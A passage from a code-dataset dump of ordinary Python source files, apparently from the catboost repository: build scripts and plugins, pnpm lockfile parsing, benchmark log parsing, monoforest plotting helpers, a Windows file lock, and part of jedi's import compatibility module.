self.copy("*.so*", "lib", "lib", symlinks = True)
def package_info(self):
self.cpp_info.name = self.name
def deploy(self):
# install if CONAN_INSTALL_PREFIX env variable is set
prefix = os.getenv("CONAN_INSTALL_PREFIX")
if prefix == None:
print("set CONAN_INSTALL_PREFIX env variable to install to local directory, e.g.")
print("export CONAN_INSTALL_PREFIX=$HOME/.local")
else:
print(f"Installing {self.name} to {prefix}")
# create destination directories if necessary
dstBinPath = os.path.join(prefix, "bin")
if not os.path.exists(dstBinPath):
os.mkdir(dstBinPath)
#print(f"dstBinPath: {dstBinPath}")
dstLibPath = os.path.join(prefix, "lib")
if not os.path.exists(dstLibPath):
os.mkdir(dstLibPath)
#print(f"dstLibPath: {dstLibPath}")
# copy executables
for bindir in self.cpp_info.bindirs:
srcBinPath = os.path.join(self.cpp_info.rootpath, bindir)
#print(f"srcBinPath {srcBinPath}")
if os.path.isdir(srcBinPath):
files = os.listdir(srcBinPath)
for file in files:
print(f"install {file}")
src = os.path.join(srcBinPath, file)
dst = os.path.join(dstBinPath, file)
if os.path.isfile(src):
copy(src, dst)
# copy libraries
for libdir in self.cpp_info.libdirs:
srcLibPath = os.path.join(self.cpp_info.rootpath, libdir)
#print(f"srcLibPath {srcLibPath}")
if os.path.isdir(srcLibPath):
files = os.listdir(srcLibPath)
for file in files:
print(f"install {file}")
src = os.path.join(srcLibPath, file)
dst = os.path.join(dstLibPath, file)
if os.path.isfile(src):
copy(src, dst)
``` |
{
"source": "jochenater/catboost",
"score": 2
} |
#### File: python/tests/test_common.py
```python
import subprocess
import pytest
from build.platform.python.tests import testlib
PYTHON_VERSIONS = ["2.7", "3.4", "3.5", "3.6"] # 3.7, 3.8 are not runnable
@pytest.mark.parametrize("pyver", PYTHON_VERSIONS)
def test_version_matched(pyver):
testlib.check_python_version(pyver)
@pytest.mark.parametrize("pyver", PYTHON_VERSIONS)
def test_python_max_unicode_bytes(pyver):
cmd = [testlib.get_python_bin(pyver), '-c', 'import sys; print(sys.maxunicode)']
maxunicode = subprocess.check_output(cmd, stderr=subprocess.STDOUT).decode('utf-8')
assert int(maxunicode) > 65535, "Found UCS2 build"
@pytest.mark.parametrize("pyver", PYTHON_VERSIONS)
def test_python_imports(pyver):
imports = {
"2.7": ['pkg_resources'],
"3.4": [],
"3.5": ['pkg_resources'],
"3.6": [],
}
for imp in imports[pyver]:
subprocess.check_call([testlib.get_python_bin(pyver), '-c', 'import ' + imp])
```
#### File: build/plugins/cpp_style.py
```python
import os
from _common import sort_by_keywords
def on_style(unit, *args):
def it():
yield 'DONT_PARSE'
for f in args:
f = f[len('${ARCADIA_ROOT}') + 1:]
if '/generated/' in f:
continue
yield f
yield '/cpp_style/files/' + f
unit.onresource(list(it()))
```
#### File: build/plugins/credits.py
```python
from _common import rootrel_arc_src
def oncredits_disclaimer(unit, *args):
if unit.get('WITH_CREDITS'):
unit.message(["warn", "CREDITS WARNING: {}".format(' '.join(args))])
def oncheck_contrib_credits(unit, *args):
module_path = rootrel_arc_src(unit.path(), unit)
excepts = set()
if 'EXCEPT' in args:
args = list(args)
except_pos = args.index('EXCEPT')
excepts = set(args[except_pos + 1:])
args = args[:except_pos]
for arg in args:
if module_path.startswith(arg) and not unit.get('CREDITS_TEXTS_FILE') and not unit.get('NO_CREDITS_TEXTS_FILE'):
for ex in excepts:
if module_path.startswith(ex):
break
else:
unit.message(["error", "License texts not found. See https://st.yandex-team.ru/DTCC-324"])
```
#### File: package_manager/base/lockfile.py
```python
import os
from abc import ABCMeta, abstractmethod
from six import add_metaclass
class LockfilePackageMeta(object):
"""
Basic struct representing package meta from lockfile.
"""
__slots__ = ("name", "version", "sky_id", "integrity", "integrity_algorithm", "tarball_path")
@staticmethod
def from_str(s):
return LockfilePackageMeta(*s.strip().split(" "))
def __init__(self, name, version, sky_id, integrity, integrity_algorithm):
self.name = name
self.version = version
self.sky_id = sky_id
self.integrity = integrity
self.integrity_algorithm = integrity_algorithm
self.tarball_path = "{}-{}.tgz".format(name, version)
def to_str(self):
return " ".join([self.name, self.version, self.sky_id, self.integrity, self.integrity_algorithm])
class LockfilePackageMetaInvalidError(RuntimeError):
pass
@add_metaclass(ABCMeta)
class BaseLockfile(object):
@classmethod
def load(cls, path):
"""
:param path: lockfile path
:type path: str
:rtype: BaseLockfile
"""
pj = cls(path)
pj.read()
return pj
def __init__(self, path):
if not os.path.isabs(path):
raise TypeError("Absolute path required, given: {}".format(path))
self.path = path
self.data = None
@abstractmethod
def read(self):
pass
@abstractmethod
def write(self, path=None):
pass
@abstractmethod
def get_packages_meta(self):
pass
@abstractmethod
def update_tarball_resolutions(self, fn):
pass
```
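`LockfilePackageMeta.from_str` and `to_str` round-trip the space-separated package records. A small illustration with made-up values, assuming the class above is in scope:
```python
# Made-up record; field order follows LockfilePackageMeta.__init__.
meta = LockfilePackageMeta.from_str("left-pad 1.3.0 rbtorrent:abc0123 deadbeef sha512")

print(meta.tarball_path)  # -> left-pad-1.3.0.tgz
print(meta.to_str())      # -> left-pad 1.3.0 rbtorrent:abc0123 deadbeef sha512
```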
#### File: package_manager/pnpm/lockfile.py
```python
import base64
import binascii
import yaml
import os
from six.moves.urllib import parse as urlparse
from six import iteritems
from ..base import PackageJson, BaseLockfile, LockfilePackageMeta, LockfilePackageMetaInvalidError
class PnpmLockfile(BaseLockfile):
IMPORTER_KEYS = PackageJson.DEP_KEYS + ("specifiers",)
def read(self):
with open(self.path, "r") as f:
self.data = yaml.load(f, Loader=yaml.CSafeLoader)
def write(self, path=None):
"""
:param path: path to store lockfile, defaults to original path
:type path: str
"""
if path is None:
path = self.path
with open(path, "w") as f:
yaml.dump(self.data, f, Dumper=yaml.CSafeDumper)
def get_packages_meta(self):
"""
Extracts packages meta from lockfile.
:rtype: list of LockfilePackageMeta
"""
packages = self.data.get("packages", {})
return map(lambda x: _parse_package_meta(*x), iteritems(packages))
def update_tarball_resolutions(self, fn):
"""
:param fn: maps `LockfilePackageMeta` instance to new `resolution.tarball` value
:type fn: lambda
"""
packages = self.data.get("packages", {})
for key, meta in iteritems(packages):
meta["resolution"]["tarball"] = fn(_parse_package_meta(key, meta))
packages[key] = meta
def get_importers(self):
"""
Returns "importers" section from the lockfile or creates similar structure from "dependencies" and "specifiers".
:rtype: dict of dict of dict of str
"""
importers = self.data.get("importers")
if importers is not None:
return importers
importer = {k: self.data[k] for k in self.IMPORTER_KEYS if k in self.data}
return ({".": importer} if importer else {})
def merge(self, lf):
"""
Merges two lockfiles:
1. Converts the lockfile to monorepo-like lockfile with "importers" section instead of "dependencies" and "specifiers".
2. Merges `lf`'s dependencies and specifiers to importers.
3. Merges `lf`'s packages to the lockfile.
:param lf: lockfile to merge
:type lf: PnpmLockfile
"""
importers = self.get_importers()
build_path = os.path.dirname(self.path)
for [importer, imports] in iteritems(lf.get_importers()):
importer_path = os.path.normpath(os.path.join(os.path.dirname(lf.path), importer))
importer_rel_path = os.path.relpath(importer_path, build_path)
importers[importer_rel_path] = imports
self.data["importers"] = importers
for k in self.IMPORTER_KEYS:
self.data.pop(k, None)
packages = self.data.get("packages", {})
for k, v in iteritems(lf.data.get("packages", {})):
if k not in packages:
packages[k] = v
self.data["packages"] = packages
def _parse_package_meta(key, meta):
"""
    :param key: unique package key from lockfile
:type key: string
:param meta: package meta dict from lockfile
:type meta: dict
    :rtype: LockfilePackageMeta
"""
try:
name, version = _parse_package_key(key)
sky_id = _parse_sky_id_from_tarball_url(meta["resolution"]["tarball"])
integrity_algorithm, integrity = _parse_package_integrity(meta["resolution"]["integrity"])
except KeyError as e:
raise TypeError("Invalid package meta for key {}, missing {} key".format(key, e))
except LockfilePackageMetaInvalidError as e:
raise TypeError("Invalid package meta for key {}, parse error: {}".format(key, e))
return LockfilePackageMeta(name, version, sky_id, integrity, integrity_algorithm)
def _parse_package_key(key):
"""
:param key: package key in format "/({scope}/)?{package_name}/{package_version}(_{peer_dependencies})?"
:type key: string
:return: tuple of scoped package name and version
:rtype: (str, str)
"""
try:
tokens = key.split("/")[1:]
version = tokens.pop().split("_", 1)[0]
if len(tokens) < 1 or len(tokens) > 2:
raise TypeError()
except (IndexError, TypeError):
raise LockfilePackageMetaInvalidError("Invalid package key")
return ("/".join(tokens), version)
def _parse_sky_id_from_tarball_url(tarball_url):
"""
:param tarball_url: tarball url
:type tarball_url: string
:return: sky id
:rtype: string
"""
if tarball_url.startswith("file:"):
return ""
rbtorrent_param = urlparse.parse_qs(urlparse.urlparse(tarball_url).query).get("rbtorrent")
if rbtorrent_param is None:
raise LockfilePackageMetaInvalidError("Missing rbtorrent param in tarball url {}".format(tarball_url))
return "rbtorrent:{}".format(rbtorrent_param[0])
def _parse_package_integrity(integrity):
"""
:param integrity: package integrity in format "{algo}-{base64_of_hash}"
:type integrity: string
:return: tuple of algorithm and hash (hex)
:rtype: (str, str)
"""
algo, hash_b64 = integrity.split("-", 1)
try:
hash_hex = binascii.hexlify(base64.b64decode(hash_b64))
except TypeError as e:
raise LockfilePackageMetaInvalidError("Invalid package integrity encoding, integrity: {}, error: {}".format(integrity, e))
return (algo, hash_hex)
```
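The module-level helpers at the bottom of this file are easiest to understand on concrete inputs; the values below are made up but follow the documented formats (a scoped package key with a peer-dependency suffix, and an `{algo}-{base64}` integrity string).
```python
# Made-up inputs illustrating the documented formats; the functions are the
# private helpers defined above in pnpm/lockfile.py.
print(_parse_package_key("/@scope/name/1.2.3_peerdep@4.5.6"))
# -> ('@scope/name', '1.2.3')

print(_parse_package_integrity("sha512-3q2+7w=="))
# -> ('sha512', b'deadbeef')   # hex of the base64-decoded digest
```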
#### File: build/scripts/build_java_with_error_prone.py
```python
import sys
import os
ERROR_PRONE_FLAGS = [
'-Xep:FunctionalInterfaceMethodChanged:WARN',
'-Xep:ReturnValueIgnored:WARN',
]
JAVA10_EXPORTS = [
'--add-exports=jdk.compiler/com.sun.tools.javac.api=ALL-UNNAMED',
'--add-exports=jdk.compiler/com.sun.tools.javac.util=ALL-UNNAMED',
'--add-exports=jdk.compiler/com.sun.tools.javac.tree=ALL-UNNAMED',
'--add-exports=jdk.compiler/com.sun.tools.javac.main=ALL-UNNAMED',
'--add-exports=jdk.compiler/com.sun.tools.javac.code=ALL-UNNAMED',
'--add-exports=jdk.compiler/com.sun.tools.javac.processing=ALL-UNNAMED',
'--add-exports=jdk.compiler/com.sun.tools.javac.parser=ALL-UNNAMED',
'--add-exports=jdk.compiler/com.sun.tools.javac.comp=ALL-UNNAMED'
]
def just_do_it(argv):
java, error_prone_tool, javac_cmd = argv[0], argv[1], argv[2:]
if java.endswith('javac') or java.endswith('javac.exe'):
for f in javac_cmd:
if f.startswith('-Xep'):
ERROR_PRONE_FLAGS.append(f)
for f in ERROR_PRONE_FLAGS:
if f in javac_cmd:
javac_cmd.remove(f)
os.execv(java, [java] + JAVA10_EXPORTS + ['-processorpath', error_prone_tool, '-XDcompilePolicy=byfile'] + [(' '.join(['-Xplugin:ErrorProne'] + ERROR_PRONE_FLAGS))] + javac_cmd)
else:
os.execv(java, [java, '-Xbootclasspath/p:' + error_prone_tool, 'com.google.errorprone.ErrorProneCompiler'] + ERROR_PRONE_FLAGS + javac_cmd)
if __name__ == '__main__':
just_do_it(sys.argv[1:])
```
#### File: build/scripts/compile_pysrc.py
```python
import argparse
import os
import shutil
import subprocess
import tarfile
LIMIT = 6000
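# rough upper bound on the combined length of the (path, key) arguments passed to a
# single rescompiler invocation; main() below splits the output into numbered chunks
# once this limit would be exceeded (inferred from its usage)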
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument('--input', required=True)
parser.add_argument('--output', required=True)
parser.add_argument('--rescompiler', required=True)
subparsers = parser.add_subparsers(dest='mode')
parser_py2 = subparsers.add_parser('py2')
parser_py2.add_argument('--py_compile', required=True)
parser_py2.add_argument('--python', required=True)
parser_py3 = subparsers.add_parser('py3')
parser_py3.add_argument('--pycc', required=True)
return parser.parse_args()
def call(cmd, cwd=None, env=None):
return subprocess.check_output(cmd, stdin=None, stderr=subprocess.STDOUT, cwd=cwd, env=env)
def iterate_py2_resource_params(py_files):
for py in py_files:
mod = py[:-3].replace('/', '.')
key = '/py_modules/{}'.format(mod)
yield py, key
yield '-', 'resfs/src/{}={}'.format(key, py)
yield '{}.yapyc'.format(py), '/py_code/{}'.format(mod)
def iterate_py3_resource_params(py_files):
for py in py_files:
for ext in ('', '.yapyc3'):
path = '{}{}'.format(py, ext)
dest = 'py/{}'.format(path)
key = 'resfs/file/{}'.format(dest)
src = 'resfs/src/{}={}'.format(key, os.path.basename(path))
yield '-', src
yield path, key
def main():
args = parse_args()
names = []
with tarfile.open(args.input, 'r') as tar:
names = tar.getnames()
tar.extractall()
if args.mode == 'py3':
pycc_cmd = [args.pycc]
pycc_ext = '.yapyc3'
iterate_resource_params = iterate_py3_resource_params
else:
pycc_cmd = [args.python, args.py_compile]
pycc_ext = '.yapyc'
iterate_resource_params = iterate_py2_resource_params
py_files = sorted(names)
for py in py_files:
cmd = pycc_cmd + ['{}-'.format(os.path.basename(py)), py, '{}{}'.format(py, pycc_ext)]
call(cmd)
outputs = []
cmd = [args.rescompiler, '{}.0'.format(args.output)]
size = 0
for path, key in iterate_resource_params(py_files):
addendum = len(path) + len(key)
if size + addendum > LIMIT and len(cmd) > 2:
call(cmd)
outputs.append(cmd[1])
cmd[1] = '{}.{}'.format(args.output, len(outputs))
cmd = cmd[0:2]
size = 0
cmd.extend([path, key])
size += addendum
if len(outputs) == 0:
cmd[1] = args.output
call(cmd)
else:
call(cmd)
outputs.append(cmd[1])
with open(args.output, 'w') as fout:
for fname in outputs:
with open(fname, 'r') as fin:
shutil.copyfileobj(fin, fout)
if __name__ == '__main__':
main()
```
#### File: build/scripts/cpp_flatc_wrapper.py
```python
import os
import subprocess
import sys
def main():
cmd = sys.argv[1:]
h_file = None
try:
index = cmd.index('-o')
h_file = cmd[index+1]
cmd[index+1] = os.path.dirname(h_file)
except (ValueError, IndexError):
pass
p = subprocess.Popen(cmd, stdin=None, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = p.communicate()
if p.returncode:
if out:
sys.stderr.write('stdout:\n{}\n'.format(out))
if err:
sys.stderr.write('stderr:\n{}\n'.format(err))
sys.exit(p.returncode)
if h_file and h_file.endswith(('.fbs.h', '.fbs64.h')):
cpp_file = '{}.cpp'.format(h_file[:-2])
with open(cpp_file, 'w') as f:
f.write('#include "{}"\n'.format(os.path.basename(h_file)))
sys.exit(0)
if __name__ == '__main__':
main()
```
#### File: build/scripts/wrap_groovyc.py
```python
import platform
import sys
import os
import subprocess
def fix_windows(args):
for arg in args:
if os.path.basename(arg) == 'groovyc' and os.path.basename(os.path.dirname(arg)) == 'bin':
yield arg + '.bat'
else:
yield arg
if __name__ == '__main__':
env = os.environ.copy()
jdk = sys.argv[1]
env['JAVA_HOME'] = jdk
args = sys.argv[2:]
if platform.system() == 'Windows':
sys.exit(subprocess.Popen(list(fix_windows(args)), env=env).wait())
else:
os.execve(args[0], args, env)
```
#### File: benchmarks/training_speed/log_parser.py
```python
import json
import os
import re
from collections import namedtuple
import numpy as np
ALGORITHMS = [method + '-' + device_type
for device_type in ['CPU', 'GPU']
for method in ['catboost', 'xgboost', 'lightgbm']]
TIME_REGEX = r'Time: \[\s*(\d+\.?\d*)\s*\]\t'
ELAPSED_REGEX = re.compile(r'Elapsed: (\d+\.?\d*)')
LOG_LINE_REGEX = {
'lightgbm': re.compile(TIME_REGEX + r'\[(\d+)\]\tvalid_0\'s (\w+): (\d+\.?\d*)'),
'xgboost': re.compile(TIME_REGEX + r'\[(\d+)\]\t([a-zA-Z\-]+):(\d+\.?\d*)'),
'catboost': re.compile(TIME_REGEX + r'(\d+)'),
'catboost-tsv': re.compile(r'(\d+)(\t(\d+\.?\d*))+\n')
}
class Track:
param_regex = re.compile(r'(\w+)\[(\d+\.?\d*)\]')
def __init__(self, algorithm_name, experiment_name, task_type, parameters_str, time_series, scores, duration):
self.log_name = parameters_str
self.algorithm_name = algorithm_name
self.scores = scores
self.experiment_name = experiment_name
self.task_type = task_type
self.duration = duration
self.parameters_str = parameters_str
assert len(time_series), "Empty time series may indicate that this benchmark failed to parse logs for " + str(algorithm_name)
for i in range(1, time_series.shape[0]):
if time_series[i] - time_series[i - 1] < 0.:
time_series[i:] = time_series[i:] + 60.
dur_series = time_series[-1] - time_series[0]
diff_elapsed_time = np.abs(dur_series - duration)
if diff_elapsed_time > 100:
print(parameters_str)
print('WARNING: difference ' + str(diff_elapsed_time) + ' in calculated duration may indicate broken log.')
self.time_series = time_series
assert(np.all(self.time_series - self.time_series[0] >= 0.))
self.time_per_iter = time_series[1:] - time_series[:-1]
params = Track.param_regex.findall(parameters_str)
param_keys = []
param_values = []
for param in sorted(params, key=lambda x: x[0]):
param_keys.append(param[0])
param_values.append(float(param[1]))
self.params_type = namedtuple('Params', param_keys)
self.params = self.params_type(*param_values)
self.params_dict = {key: value for key, value in zip(param_keys, param_values)}
def __str__(self):
params_str = ''
for i, field in enumerate(self.params._fields):
if field == 'iterations':
continue
params_str += ', ' + field + ':' + str(self.params[i])
return self.algorithm_name + params_str
def __eq__(self, other):
        return self.algorithm_name == other.algorithm_name and self.params == other.params
@staticmethod
def hash(experiment_name, algorithm_name, task_type, parameters_str):
return hash(experiment_name + algorithm_name + task_type + parameters_str)
def __hash__(self):
return Track.hash(self.experiment_name, self.algorithm_name, self.task_type, self.parameters_str)
def dump_to_json(self):
return {
self.__hash__(): {
"dataset": self.experiment_name,
"algorithm_name": self.algorithm_name,
"task_type": self.task_type,
"parameters": self.parameters_str,
"scores": list(self.scores),
"time_series": list(self.time_series),
"duration": self.duration
}
}
def get_series(self):
return self.time_series, self.scores
def get_time_per_iter(self):
return self.time_per_iter
def get_median_time_per_iter(self):
return np.median(self.time_per_iter)
def get_fit_iterations(self):
return self.time_series.shape[0]
def get_best_score(self):
return np.min(self.scores)
TASK_TYPES_ACCURACY = ['binclass', 'multiclass']
METRIC_NAME = {
'lightgbm': {'regression': 'rmse', 'binclass': 'binary_error', 'multiclass': 'multi_error'},
'xgboost': {'regression': 'eval-rmse', 'binclass': 'eval-error', 'multiclass': 'eval-merror'},
'catboost': {'regression': 'RMSE', 'binclass': 'Accuracy', 'multiclass': 'Accuracy'}
}
def parse_catboost_log(test_error_file, task_type, iterations):
values = []
with open(test_error_file) as metric_log:
file_content = metric_log.read()
first_line_idx = file_content.find('\n')
first_line = file_content[:first_line_idx]
header = first_line.split('\t')
column_idx = header.index(METRIC_NAME['catboost'][task_type])
regex = LOG_LINE_REGEX['catboost-tsv']
matches = regex.findall(file_content)
if len(matches) != int(iterations):
print('WARNING: Broken log file (num matches not equal num iterations): ' + test_error_file)
for match in matches:
value = float(match[column_idx])
if task_type in TASK_TYPES_ACCURACY:
# Convert to error
value = 1. - value
values.append(value)
return values
def parse_log(algorithm_name, experiment_name, task_type, params_str, file_name, iterations):
time_series = []
values = []
    # strip the '-CPU'/'-GPU' suffix explicitly (str.rstrip would treat its argument as a character set)
    algorithm = algorithm_name.rsplit('-', 1)[0]
if algorithm == 'catboost':
catboost_train_dir = file_name + 'dir'
test_error_file = os.path.join(catboost_train_dir, 'test_error.tsv')
values = parse_catboost_log(test_error_file, task_type, iterations)
with open(file_name, 'r') as log:
file_content = log.read()
regex = LOG_LINE_REGEX[algorithm]
matches = regex.findall(file_content)
if len(matches) != int(iterations):
print('WARNING: Broken log file ' + file_name)
for i, match in enumerate(matches):
time_series.append(float(match[0]))
if algorithm in ['lightgbm', 'xgboost']:
metric = match[2]
# Sanity check on parsed metric
assert metric == METRIC_NAME[algorithm][task_type]
values.append(float(match[3]))
duration = ELAPSED_REGEX.findall(file_content)
duration = float(duration[0]) if len(duration) > 0 else 0.
return Track(algorithm_name, experiment_name, task_type, params_str,
np.array(time_series), np.array(values), duration)
def read_results(results_file):
with open(results_file, 'r') as f:
results_json = json.load(f)
results = results_json.values()
tracks = {}
for result in results:
experiment_name = result["dataset"]
algorithm_name = result["algorithm_name"]
if experiment_name not in tracks:
tracks[experiment_name] = {}
if algorithm_name not in tracks[experiment_name]:
tracks[experiment_name][algorithm_name] = []
track = Track(algorithm_name, experiment_name, result["task_type"], result["parameters"],
np.array(result["time_series"]), np.array(result["scores"]), result["duration"])
tracks[experiment_name][algorithm_name].append(track)
return tracks
```
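The log-line regexes above are easiest to read against a concrete line; the example below is fabricated to match the hard-coded xgboost format and only shows what the capture groups contain.
```python
# Fabricated xgboost-style log line matching TIME_REGEX + the xgboost pattern above.
import re

TIME_REGEX = r'Time: \[\s*(\d+\.?\d*)\s*\]\t'
xgb_regex = re.compile(TIME_REGEX + r'\[(\d+)\]\t([a-zA-Z\-]+):(\d+\.?\d*)')

line = 'Time: [ 12.5 ]\t[3]\teval-rmse:0.2471'
print(xgb_regex.findall(line))
# -> [('12.5', '3', 'eval-rmse', '0.2471')]
```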
#### File: python-package/catboost/monoforest.py
```python
import math
from . import _catboost
from .core import CatBoost, CatBoostError
from .utils import _import_matplotlib
FeatureExplanation = _catboost.FeatureExplanation
def _check_model(model):
if not isinstance(model, CatBoost):
raise CatBoostError("Model should be CatBoost")
def to_polynom(model):
_check_model(model)
return _catboost.to_polynom(model._object)
def to_polynom_string(model):
_check_model(model)
return _catboost.to_polynom_string(model._object)
def explain_features(model):
_check_model(model)
return _catboost.explain_features(model._object)
def calc_features_strength(model):
explanations = explain_features(model)
features_strength = [expl.calc_strength() for expl in explanations]
return features_strength
def plot_pdp(arg, size_per_plot=(5, 5), plots_per_row=None):
with _import_matplotlib() as _plt:
plt = _plt
if isinstance(arg, CatBoost):
arg = explain_features(arg)
if isinstance(arg, _catboost.FeatureExplanation):
arg = [arg]
assert len(arg) > 0
assert isinstance(arg, list)
for element in arg:
assert isinstance(element, _catboost.FeatureExplanation)
figs = []
for feature_explanation in arg:
dimension = feature_explanation.dimension()
if not plots_per_row:
plots_per_row = min(5, dimension)
rows = int(math.ceil(dimension / plots_per_row))
fig, axes = plt.subplots(rows, plots_per_row)
fig.suptitle("Feature #{}".format(feature_explanation.feature))
if rows == 1:
axes = [axes]
if plots_per_row == 1:
axes = [[row_axes] for row_axes in axes]
fig.set_size_inches(size_per_plot[0] * plots_per_row, size_per_plot[1] * rows)
for dim in range(dimension):
ax = axes[dim // plots_per_row][dim % plots_per_row]
ax.set_title("Dimension={}".format(dim))
ax.set_xlabel("feature value")
ax.set_ylabel("model value")
borders, values = feature_explanation.calc_pdp(dim)
xs = []
ys = []
if feature_explanation.type == "Float":
if len(borders) == 0:
xs.append(-0.1)
xs.append(0.1)
ys.append(feature_explanation.expected_bias[dim])
ys.append(feature_explanation.expected_bias[dim])
ax.plot(xs, ys)
else:
offset = max(0.1, (borders[0] + borders[-1]) / 2)
xs.append(borders[0] - offset)
ys.append(feature_explanation.expected_bias[dim])
for border, value in zip(borders, values):
xs.append(border)
ys.append(ys[-1])
xs.append(border)
ys.append(value)
xs.append(borders[-1] + offset)
ys.append(ys[-1])
ax.plot(xs, ys)
else:
xs = ['bias'] + list(map(str, borders))
ys = feature_explanation.expected_bias[dim] + values
ax.bar(xs, ys)
figs.append(fig)
return figs
def plot_features_strength(model, height_per_feature=0.5, width_per_plot=5, plots_per_row=None):
with _import_matplotlib() as _plt:
plt = _plt
strengths = calc_features_strength(model)
dimension = len(strengths[0])
features = len(strengths)
if not plots_per_row:
plots_per_row = min(5, dimension)
rows = int(math.ceil(dimension / plots_per_row))
fig, axes = plt.subplots(rows, plots_per_row)
if rows == 1:
axes = [axes]
if plots_per_row == 1:
axes = [[row_axes] for row_axes in axes]
fig.suptitle("Features Strength")
fig.set_size_inches(width_per_plot * plots_per_row, height_per_feature * features * rows)
for dim in range(dimension):
            # keep the per-dimension values in a separate name so the original
            # per-feature strength vectors are not overwritten between dimensions
            dim_strengths = [(s[dim], i) for i, s in enumerate(strengths)]
            # dim_strengths = list(reversed(sorted(dim_strengths)))
            dim_strengths = list(sorted(dim_strengths))
            labels = ["Feature #{}".format(f) for _, f in dim_strengths]
            values = [s for s, _ in dim_strengths]
            ax = axes[dim // plots_per_row][dim % plots_per_row]
            colors = [(1, 0, 0) if s > 0 else (0, 0, 1) for s in values]
            ax.set_title("Dimension={}".format(dim))
            ax.barh(range(len(values)), values, align='center', color=colors)
            ax.set_yticks(range(len(values)))
ax.set_yticklabels(labels)
# ax.invert_yaxis() # labels read top-to-bottom
ax.set_xlabel('Prediction value change')
return fig
```
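A minimal usage sketch for the helpers above, assuming a CatBoost build with monoforest support and matplotlib available; the dataset and hyperparameters are illustrative only.
```python
# Illustrative sketch only: assumes `catboost` (with monoforest support) and
# matplotlib are installed. Dataset and hyperparameters are made up.
from catboost import CatBoostRegressor
from catboost.monoforest import to_polynom_string, plot_pdp

X = [[1.0, 2.0], [2.0, 1.0], [3.0, 4.0], [4.0, 3.0]]
y = [1.0, 2.0, 3.0, 4.0]

model = CatBoostRegressor(iterations=10, depth=2, verbose=False)
model.fit(X, y)

print(to_polynom_string(model))  # the ensemble rewritten as a polynom
figs = plot_pdp(model)           # one matplotlib figure per explained feature
```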
#### File: py2/filelock/_windows.py
```python
import os
from errno import ENOENT
from ._api import BaseFileLock
from ._util import raise_on_exist_ro_file
try:
import msvcrt
except ImportError:
msvcrt = None
class WindowsFileLock(BaseFileLock):
"""Uses the :func:`msvcrt.locking` function to hard lock the lock file on windows systems."""
def _acquire(self):
raise_on_exist_ro_file(self._lock_file)
mode = (
os.O_RDWR # open for read and write
| os.O_CREAT # create file if not exists
| os.O_TRUNC # truncate file if not empty
)
try:
fd = os.open(self._lock_file, mode)
except OSError as exception:
if exception.errno == ENOENT: # No such file or directory
raise
else:
try:
msvcrt.locking(fd, msvcrt.LK_NBLCK, 1)
except (OSError, IOError): # noqa: B014 # IOError is not OSError on python 2
os.close(fd)
else:
self._lock_file_fd = fd
def _release(self):
fd = self._lock_file_fd
self._lock_file_fd = None
msvcrt.locking(fd, msvcrt.LK_UNLCK, 1)
os.close(fd)
try:
os.remove(self._lock_file)
        # Probably another instance of the application has acquired the file lock.
except OSError:
pass
__all__ = [
"WindowsFileLock",
]
```
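A hedged sketch of how this class is normally reached through the package's public API; `filelock.FileLock` selects the platform-specific implementation (the msvcrt-based one above on Windows). File names are illustrative.
```python
# Sketch, not part of the library: assumes the `filelock` package is installed.
from filelock import FileLock, Timeout

lock = FileLock("resource.txt.lock")  # illustrative path
try:
    with lock.acquire(timeout=1):
        # Only one process at a time executes this critical section.
        with open("resource.txt", "a") as f:
            f.write("exclusive write\n")
except Timeout:
    print("another process holds resource.txt.lock")
```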
#### File: jedi/jedi/_compatibility.py
```python
import errno
import sys
import os
import re
import pkgutil
import warnings
import inspect
import subprocess
try:
import importlib
except ImportError:
pass
is_py3 = sys.version_info[0] >= 3
is_py35 = is_py3 and sys.version_info[1] >= 5
py_version = int(str(sys.version_info[0]) + str(sys.version_info[1]))
class DummyFile(object):
def __init__(self, loader, string):
self.loader = loader
self.string = string
def read(self):
return self.loader.get_source(self.string)
def close(self):
del self.loader
def find_module_py34(string, path=None, full_name=None, is_global_search=True):
spec = None
loader = None
for finder in sys.meta_path:
if is_global_search and finder != importlib.machinery.PathFinder:
p = None
else:
p = path
try:
find_spec = finder.find_spec
except AttributeError:
            # These are old-school classes that still have a different API, just
# ignore those.
continue
spec = find_spec(string, p)
if spec is not None:
loader = spec.loader
if loader is None and not spec.has_location:
# This is a namespace package.
full_name = string if not path else full_name
implicit_ns_info = ImplicitNSInfo(full_name, spec.submodule_search_locations._path)
return None, implicit_ns_info, False
break
return find_module_py33(string, path, loader)
def find_module_py33(string, path=None, loader=None, full_name=None, is_global_search=True):
loader = loader or importlib.machinery.PathFinder.find_module(string, path)
if loader is None and path is None: # Fallback to find builtins
try:
with warnings.catch_warnings(record=True):
# Mute "DeprecationWarning: Use importlib.util.find_spec()
# instead." While we should replace that in the future, it's
# probably good to wait until we deprecate Python 3.3, since
# it was added in Python 3.4 and find_loader hasn't been
# removed in 3.6.
loader = importlib.find_loader(string)
except ValueError as e:
# See #491. Importlib might raise a ValueError, to avoid this, we
# just raise an ImportError to fix the issue.
raise ImportError("Originally " + repr(e))
if loader is None:
raise ImportError("Couldn't find a loader for {}".format(string))
try:
is_package = loader.is_package(string)
if is_package:
if hasattr(loader, 'path'):
module_path = os.path.dirname(loader.path)
else:
# At least zipimporter does not have path attribute
module_path = os.path.dirname(loader.get_filename(string))
if hasattr(loader, 'archive'):
module_file = DummyFile(loader, string)
else:
module_file = None
else:
module_path = loader.get_filename(string)
module_file = DummyFile(loader, string)
except AttributeError:
        # ExtensionLoader has no attribute get_filename, instead it has a
# path attribute that we can use to retrieve the module path
try:
module_path = loader.path
module_file = DummyFile(loader, string)
except AttributeError:
module_path = string
module_file = None
finally:
is_package = False
if hasattr(loader, 'archive'):
module_path = loader.archive
return module_file, module_path, is_package
def find_module_pre_py34(string, path=None, full_name=None, is_global_search=True):
# This import is here, because in other places it will raise a
# DeprecationWarning.
import imp
try:
module_file, module_path, description = imp.find_module(string, path)
module_type = description[2]
return module_file, module_path, module_type is imp.PKG_DIRECTORY
except ImportError:
pass
if path is None:
path = sys.path
for item in path:
loader = pkgutil.get_importer(item)
if loader:
try:
loader = loader.find_module(string)
if loader:
is_package = loader.is_package(string)
is_archive = hasattr(loader, 'archive')
module_path = loader.get_filename(string)
if is_package:
module_path = os.path.dirname(module_path)
if is_archive:
module_path = loader.archive
file = None
if not is_package or is_archive:
file = DummyFile(loader, string)
return file, module_path, is_package
except ImportError:
pass
raise ImportError("No module named {}".format(string))
find_module = find_module_py34 if is_py3 else find_module_pre_py34
find_module.__doc__ = """
Provides information about a module.
This function isolates the differences in importing libraries introduced with
python 3.3 on; it gets a module name and optionally a path. It will return a
